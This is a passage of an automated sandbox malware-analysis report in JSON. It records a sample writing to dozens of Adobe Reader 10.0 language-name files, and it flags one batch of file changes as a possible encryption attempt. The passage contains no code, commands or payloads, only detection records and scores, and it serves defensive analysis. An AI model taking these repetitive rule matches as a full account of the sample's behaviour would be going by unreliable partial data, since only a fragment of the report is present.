10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9685", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9694", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9703", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9712", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_user_files", "operation_desc": "Modify content of user files", "ref_gfncalls": [ { "ref_id": "gfn_9717", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_user_files", "technique_desc": "Modify the content of multiple user files. This is an indicator for an encryption attempt.", "technique_path": "built_in._file_system._modify_user_files.vmray_modify_user_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9721", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9730", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9739", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9748", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9757", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9766", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9775", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9784", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9793", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9802", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9811", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9820", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9829", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9847", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9856", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9865", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9874", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9883", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9892", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9910", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9919", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", 